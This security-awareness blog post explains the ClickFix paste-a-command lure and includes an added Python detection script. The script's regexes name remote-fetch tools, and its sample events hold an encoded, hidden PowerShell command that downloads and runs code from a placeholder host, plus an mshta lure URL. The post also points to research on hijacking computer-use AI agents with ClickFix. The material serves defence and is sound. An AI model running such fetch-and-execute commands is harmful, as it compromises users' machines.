The Copy-Paste Attack That’s Spreading Quietly

What is ClickFix?

ClickFix is a social engineering technique where an attacker convinces you to run a command or paste code on your device. The prompt often appears as a CAPTCHA, a verification step, or a “fix this error” message. The user executes the command themselves, which triggers malware or gives the attacker access.

🧩 How It Works

  1. A victim receives a phishing email, clicks on a malicious ad, or visits a compromised website.
  2. The site displays a fake “You must verify you are human” or “Fix this error” prompt.
  3. The victim is instructed to open Run (Win+R) or Terminal, paste a command, and press Enter.
  4. The pasted command executes malware or loads further stages (infostealer, RAT, loader).
  5. Because the user initiated the action, many automated defenses are bypassed.

🚨 Why It Matters

ClickFix is important because it marks a shift in how attackers operate. Instead of relying solely on software vulnerabilities or attachments, they are exploiting the most consistent weakness of all: the user.

When you are told to “paste this code” as part of what looks like a normal workflow, you become the delivery mechanism.

This method is particularly dangerous because:

  • Many security tools assume the threat comes from outside. With ClickFix, the user triggers it, making detection much harder.
  • It works on both Windows and macOS, putting a wide range of users, including less technical ones, at risk.
  • In sectors like hospitality, small businesses, and service industries—where cybersecurity resources are often limited—these user-based attacks can go unnoticed.

The future of cyber defense must include not only technology but also behavioral hygiene, teaching people that sometimes the act of clicking or pasting itself can be the threat.

🛡️ How to Protect Yourself Against ClickFix?


❓ Other Questions People Ask

1. Is ClickFix a virus, or is it malware?

ClickFix is neither. It is a social engineering tactic. It is the delivery method or the “con.” It represents the psychological tricks (the visual lure) used to convince a user to manually run malicious commands on their own computer. These commands, once run by the user, then proceed to download the actual malware (such as infostealers, Remote Access Trojans (RATs), or ransomware).

2. Does it only affect Windows?

While Windows is a primary target, attackers are also adapting the technique for macOS.

3. Can my antivirus or EDR solution automatically block ClickFix?

Not reliably, because ClickFix is designed to sidestep these tools. It evades traditional file-scanning AV because the payload is often “fileless” (running only in memory). It evades many EDR heuristics because the user, not an exploit, performs the malicious action (defeating “human intervention” checks), and because the action is carried out with trusted, legitimate system utilities such as PowerShell.
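The steps in “How It Works” and the answer above describe the one thing defenders can still see: a user-driven launch of a trusted shell (explorer.exe spawning powershell.exe, cmd.exe or mshta.exe) carrying a command line built to hide its window, decode itself, and fetch a next stage. The following Python triage script is an added example, not code from the article or from any vendor tool, and it runs over constructed sample events whose field names (`image`, `parent_image`, `command_line`) are my assumption, loosely modelled on Sysmon process-creation events. It decodes a PowerShell `-EncodedCommand` argument so that indicators hidden inside the Base64 blob are counted too.

```python
"""Triage process-creation events for ClickFix-style user-launched shells.

Added example (not from the original article). Event field names and the
sample data below are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Interpreters a ClickFix lure typically tells the victim to open and paste into.
PASTE_TARGETS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Parents that indicate a human-driven launch: the Win+R Run dialog and Start
# search are hosted by explorer.exe, so a shell whose parent is explorer.exe
# was almost certainly started by the person at the keyboard.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# Each regex is one indicator; they are matched against the raw command line
# plus the decoded -EncodedCommand payload, if any.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(
        r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin)", re.I),
    "mshta_url": re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I),
    "clipboard_source": re.compile(r"get-clipboard", re.I),
}


@dataclass
class Verdict:
    suspicious: bool
    score: int
    indicators: list = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event: dict) -> Verdict:
    """Score one process-creation event; score >= 2 is flagged for analyst review."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["command_line"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded

    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A human-launched interpreter counts as one indicator on its own, so a
    # Run-dialog PowerShell with a single payload indicator is enough to alert,
    # while a service-launched script needs two indicators before it is flagged.
    if image in PASTE_TARGETS and parent in INTERACTIVE_PARENTS:
        hits.insert(0, "interactive_launch")
    score = len(hits)
    return Verdict(suspicious=score >= 2, score=score, indicators=hits, decoded=decoded)


def scan(events: list) -> list:
    """Return (event_id, Verdict) pairs for every event that crosses the alert threshold."""
    return [(e["id"], v) for e in events if (v := triage_event(e)).suspicious]


# Constructed sample events. The "malicious" one uses a harmless placeholder
# domain; the encoded payload is built here so the sample is self-contained.
_ENCODED = base64.b64encode("iwr http://example.invalid/v | iex".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},                       # user just opened a shell
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -enc {_ENCODED}"},   # ClickFix-style paste
    {"id": 3, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/verify.hta"},  # Run-dialog mshta lure
]

if __name__ == "__main__":
    for event_id, verdict in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: score={verdict.score} indicators={verdict.indicators}")
        if verdict.decoded:
            print(f"  decoded payload: {verdict.decoded}")
```

Run against the samples, only events 2 and 4 are flagged: the plain interactive PowerShell (event 1) and the scheduled backup script (event 3) stay below the threshold. Weighting the explorer.exe parent as its own indicator is the design choice that makes this useful against ClickFix specifically: the same command line launched by a service would need a second indicator, while the user-launched case, which the article notes is what EDR tends to trust, is the one that gets the extra weight.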

4. Why is this technique rising now?

Because it leverages human behavior rather than strict technical vulnerabilities, making it scalable and effective for attackers.

5. How can organizations respond?

By combining technical controls (restricting access to Run and Terminal) with behavioral controls (training staff and building a “pause” culture).

6. Who are the main threat actors using ClickFix?

The tactic is used by a very broad spectrum of actors, which is why it is so dangerous.

Cybercriminals: It was pioneered by financially motivated groups, specifically the initial access broker TA571 and the ClearFake cluster. It is now widely used by countless criminal actors to deploy commodity malware like the Lumma Stealer.

State-Sponsored (APT) Groups: In a major strategic escalation, ClickFix has been adopted by nation-state espionage groups. Researchers have confirmed its use by APTs linked to North Korea (TA427), Iran (TA450, MuddyWater), and Russia (APT28, TA422).

🧰 What Resources Are Available to Help?

📚Books

Social Engineering by Robert W. Gehl & Sean T. Lawson

Phishing for Phools by George A. Akerlof

🎙️ Podcasts

Hacking Humans (by the CyberWire) hosted by Dave Bittner, Joe Carrigan and Maria Varmazis

Human Factor Security by Jenny Radcliffe

▶️ Video

AI ClickFix: Hijacking Computer-Use Agents with popular social engineering tricks, like ClickFix. By Embrace The Red

🧠 Final Thoughts

The ClickFix attack makes it clear that in 2025, the human element is the main battleground. Technology alone is not enough to stop these threats; the most effective, and often only, defense is teaching people to pause, question, and verify.

Attackers using methods like ClickFix exploit human actions, not just software vulnerabilities. That means the best defense combines technology with behavior. While having the right tools is important, building a culture where the team automatically follows a “stop, question, verify” mindset is just as critical as the latest endpoint protection.

Ultimately, the strongest defense is one that recognizes the user as both the target and the essential front-line defender.
